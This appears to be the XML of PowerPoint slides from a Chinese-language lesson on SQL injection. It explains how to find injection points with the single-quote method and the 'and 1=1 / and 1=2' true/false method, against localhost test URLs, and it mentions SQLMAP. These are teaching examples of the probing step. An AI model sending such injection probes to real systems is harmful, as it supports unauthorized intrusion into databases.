              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入漏洞： </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26208852-CDEF-4BCC-AEC4-30681EA175F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1539539" y="2561389"/>
            <a:ext cx="9901100" cy="940066"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1092F1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3CCA60B-9A9F-42B3-8022-AFC0E57D6F48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1747659" y="3950756"/>
            <a:ext cx="9363432" cy="499432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRP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如果攻击者使用单引号注入</a:t>
            </a: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http://localhost/test.php?id=1’</a:t>
            </a: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，那么最终的语句将变为：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="矩形: 圆角 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91A8525F-1988-4624-B482-6DD2253DB534}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460823" y="3904357"/>
            <a:ext cx="10009112" cy="2304256"/>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F8A64AF4-F09F-4F01-AA38-92067982195D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3889289" y="4448142"/>
            <a:ext cx="4865819" cy="498663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRP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select * from category where id=1‘</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2659BA08-21C0-4EB8-9045-0FCE13875D7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1784859" y="5012145"/>
            <a:ext cx="8964996" cy="961289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>这将导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>语句执行失败且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>函数不会返回任何值，后面如果有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>mysql_fetch_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>将返回给用户一条警告信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1452377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randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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left)">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P spid="27" grpId="0" animBg="1"/>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5202512" y="837929"/>
            <a:ext cx="2453727" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727"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259825" y="837929"/>
              <a:ext cx="2339102"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“永真永假”法</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460823" y="1456085"/>
            <a:ext cx="10153128" cy="1422954"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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“单引号”法很直接，也很简单，但是对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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注入有一定了解的程序员在编写程序时，都会将单引号过滤掉。如果再使用单引号测试，就无法检测到注入点了。这时，就可以使用经典的“永真永假”法。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="组合 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{446D7183-165A-4582-90F4-78E960A33401}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1604839" y="3011495"/>
            <a:ext cx="9649072" cy="1625271"/>
            <a:chOff x="4197127" y="2392190"/>
            <a:chExt cx="9649072" cy="1625271"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="矩形 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{397441C0-53D0-43C6-823C-15722501091C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4197127" y="2392190"/>
              <a:ext cx="9136338" cy="1409246"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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9A49DCB9-AA24-41AB-84AA-A2B9AFA9466D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4413151" y="2608215"/>
              <a:ext cx="9433048" cy="1409246"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="25400">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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{931D02FD-1011-4F58-B635-66D3FD4FEBB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1976963" y="3316729"/>
            <a:ext cx="6647974" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>当与上一个永真式使逻辑不受影响时，页面应当与原页面相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED5D76BD-C455-4F22-A12E-30CDBBC3CC63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1976963" y="3882422"/>
            <a:ext cx="8921951" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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例如，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>http://localhost/test.php?id=1 and 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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，传递给后台数据库服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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语句则变为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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select * from category where id=1 and 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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，并不影响原逻辑；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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0" name="直接连接符 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F41C8EC9-C668-403D-A814-41BACF1779E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2046269" y="3760341"/>
            <a:ext cx="8708629" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="0050A3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="组合 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57FBF8E6-DF7D-45F3-8BA5-2BF97C6CB353}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1604839" y="4963929"/>
            <a:ext cx="9649072" cy="1625271"/>
            <a:chOff x="4197127" y="2392190"/>
            <a:chExt cx="9649072" cy="1625271"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="矩形 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7977862F-8D32-4221-B4D3-5C1772EAD0C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4197127" y="2392190"/>
              <a:ext cx="9136338" cy="1409246"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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2C30A3DA-C458-4B5B-A21B-62E7F01C3489}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4413151" y="2608215"/>
              <a:ext cx="9433048" cy="1409246"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="25400">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矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48E3040C-4713-4477-A0AF-9C64EFC18A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979964" y="5269163"/>
            <a:ext cx="9417963" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>而与上一个永假式时，则会影响原逻辑，页面可能出错或跳转（这与设计者的设计有关）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="矩形 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E67E8FF1-F2F6-40AD-979E-40943CF63246}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979964" y="5834856"/>
            <a:ext cx="8921951" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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例如，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>http://localhost/test.php?id=1 and 1=2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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，传递给后台数据库服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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语句则变为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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select * from category where id=1 and 1=2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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24" name="直接连接符 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A923F8AE-C661-43D8-9ACC-2A94F3398FE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2049270" y="5712775"/>
            <a:ext cx="8988617" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="0050A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88358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500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>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par>
                          <p:cTn id="26" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="27" presetID="14" presetClass="entr" presetSubtype="1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randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="after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p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="40" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="41" presetID="10" presetClass="entr" presetSubtype="0" fill="hold"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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="44" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="45" presetID="14" presetClass="entr" presetSubtype="10"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randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="4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22" grpId="0"/>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3549055" y="2968253"/>
            <a:ext cx="8639372" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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SQLMAP</a:t>
            </a:r>
            <a:endPar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7276013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99E241B-4002-4B98-89C1-8A6F31F8AFDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="596727" y="875216"/>
            <a:ext cx="2448272" cy="508861"/>
            <a:chOff x="1420106" y="1402730"/>
            <a:chExt cx="2448272"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2532843" y="864088"/>
              <a:ext cx="508859" cy="1586145"/>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2053958" y="1402731"/>
